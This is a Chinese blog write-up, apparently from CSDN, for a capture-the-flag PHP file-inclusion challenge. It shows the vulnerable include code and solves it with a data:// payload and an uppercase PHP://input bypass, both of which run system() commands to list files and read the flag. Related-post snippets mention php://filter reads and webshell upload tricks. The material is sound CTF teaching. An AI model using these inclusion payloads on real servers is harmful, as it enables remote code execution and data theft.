攻防世界——文件包含与伪协议

最新推荐文章于 2024-04-09 15:16:04 发布
最新推荐文章于 2024-04-09 15:16:04 发布
阅读量700 收藏 2
点赞数 1
文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yanfangjie/article/details/112746490
版权

Web_php_include

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

分析这段代码的意思
strstr( p a g e , " p h p : / / " ) : 匹 配 P H P : / / 在 page,"php://"):匹配PHP://在 page,"php://")PHP://page出现到最后
str_replac(“php://”," ",$page):将php://变成空格。

方法一:可以使用data伪协议来绕过
输入:/?page=data://text/plain,<?php%20system("ls");%20?>
在这里插入图片描述
输入?page=data://text/plain,<?php%20system("cat%20fl4gisisish3r3.php")?>
在这里插入图片描述
什么都没有,按下f12
在这里插入图片描述
得到flag。

方法二
改题不能使用双写绕过但是可以使用大小写绕过。
输入PHP://input,来写代码获取内容。
post:<?php system(“ls”);>? 得到全部的目录
在这里插入图片描述
post:<?php system("cat fl4gisisish3r3.php");?>
在这里插入图片描述
得到flag。

hfhqhkyyzyq
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界 文件包含总结思路
qq_56559508的博客
11-18 931
web安全 php 文件包含
AWD攻防漏洞分析——文件上传
01-20
概述 这个漏洞在DVBBS6.0时代被hacker们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级高,入侵中上传漏洞也是常见的漏洞。 导致改漏洞的原因在于代码作者没有对访客提交的数据进行检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验。 上传方法 1、直接上传Webshell 2、绕过客户端检测上传webshell 3、绕过服务器文件扩展名检测上传webshell 4、绕过服务端MIME类型检测上传webshell 5、绕过文件内容检测上传webshell 6、绕过服务端目录路径检测上传webshell 7、绕过服务端漏洞上传webshell 8、利用.htacc
CTF—web题库笔记(难度4)
cocoaiu的博客
08-13 5298
CTF—web题库笔记(41-50)
攻防世界】题目名称-文件包含
最新发布
wangzhemvp的博客
04-09 628
一直显示 do not hack!,可能是 include("./check.php") 过滤了。依次尝试如下payload,还是提示 do not hack。看到 include(),想到文件包含,用php伪协议。convert.iconv. 要一个一个的破解。(1)php://filter 其他编码方式。convert.iconv.[ ]过滤器。,想到文件包含,用php伪协议。找到输出编码,再找输入编码。
攻防世界————fileclude(内含php伪协议菜鸟讲解)
weixin_62281892的博客
09-28 3950
文件包含以及涉及到的php伪协议
【愚公系列】2023年05月 攻防世界-Web(题目名称-文件包含
时光隧道
05-27 8204
文件包含漏洞(File Inclusion Vulnerability)是一种常见的Web应用程序漏洞,攻击者可以通过Web应用程序的漏洞,以某种形式包含恶意文件,或者包含在Web服务器上的其他敏感文件,从而实现权限提升、信息泄露、远程代码执行等攻击。具体案例介绍包括://定义一个变量$file并将其传递给include函数中执行 $file = $_GET [ 'file' ];攻击者通过修改传递的$file变量,替换为恶意代码文件,最终实现远程代码执行攻击。
Web_php_include(strstr与str_replace函数)
sGanYu
08-24 1221
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);#查找php://,null替换查找的值,并且规定搜索$page } include($page); ?> strstr函数 strstr(str1,str2) 函数,判断字符串str2是否是s...
php中strstr和stristr的区别及用法
zx980414k的博客
03-24 591
strstr和stristr都是匹配字符串用的,但是strstr是区分大小写的,stristr是不区分大小写的。 所以例如: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这段php代码,当page参数中有
攻防世界—file_include
小缪的博客
06-10 2725
这种漏洞通常存在于代码中,允许攻击者将未经过滤的输入作为参数传递给文件包含函数(如include()、require()等),从而加载恶意脚本或者敏感文件到服务器上,并进一步攻击系统。这种漏洞通常发生在应用程序没有对用户输入进行过滤的情况下,接受用户的输入来指定文件名或者路径,并将其传递给包含函数的时候。2.远程文件包含(RFI):攻击者通过构造一个URL链接,将远程服务器上的恶意脚本地址传递给包含函数,从而导致远程服务器上的脚本被执行。对于指定过滤器的更多信息,请参考该函数的手册页。该过滤器不支持参数,
攻防世界-题目名称-文件包含
qq_45955869的博客
06-07 218
攻防世界-题目名称-文件包含常见文件包含漏洞。php:filter//过滤。
ctf 题解
m0_68052766的博客
11-27 491
继续做题
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
网络安全基础——网络攻防、协议与安全.zip
09-13
在我国加人WTO后的今入o听A才的优字与多寡,是我国面对国际竞争时成败的关键因素。 重要任务之一。信息科学和技术方面人才的优劣与多寡,是我国面对国际竞争时成败的关键因素。 当前,正值我国高等教育特别是信息...
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
文件包含(攻防世界)
m0_70819573的博客
02-16 242
除了使其运行php代码外,可以通过伪协议来读取文件,(默认flag地址/var/www/html/flag.php)来读取flag,回显do not hack。接着考虑过滤器和字符集的问题,
攻防世界CTF —— PHP本地文件包含漏洞解题思路
weixin_47610939的博客
07-27 3935
攻防世界的CTF web类题目,关于php本地文件包含漏洞的解题思路
攻防世界-泰山杯-简单的文件包含
wwxxss
11-11 1354
使用burp的熟练对其进行爆破,再次了解文件包含的一些协议来查看文件
攻防世界-Web_php_include (四种解法)
笑花大王
01-20 4465
攻防世界-Web_php_include (考察的是文件包含) 打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空 str_replace()以其他字符替换字符串中的一些字符(区分大小写) strstr() 查找字符串首次出现的位置。返回字符串剩余部分 <?php show_source(__FILE__); echo $_GET['hello'];...
攻防世界文件包含读文件
10-01
文件含漏洞是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,可能导致文件泄露或恶意代码注入。为了防止文件包含漏洞的攻击,可以采取以下几个措施: 1. 控制输入变量:对于传入的文件名或路径,应进行合理的校验和过滤,确保不包含任何恶意的payload或协议关键字。 2. 检查文件路径:在引入文件之前,应该验证文件路径的合法性,确保只能引入指定目录下的文件。 3. 配置安全设置:禁止allow_url_fopen和allow_url_include选项,这样可以阻止远程文件的包含。 4. 最小权限原则:确保脚本运行时的用户只有必要的权限,并限制对文件的读写操作。 关于攻防世界文件包含读文件的问题,你提到了一个例子file1=php://filter/read=convert.base64-encode/resource=flag.php。这是一种利用php内置的filter机制,将文件内容以base64编码的形式读取出来。在这个例子中,flag.php文件的内容将以base64编码的形式返回。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值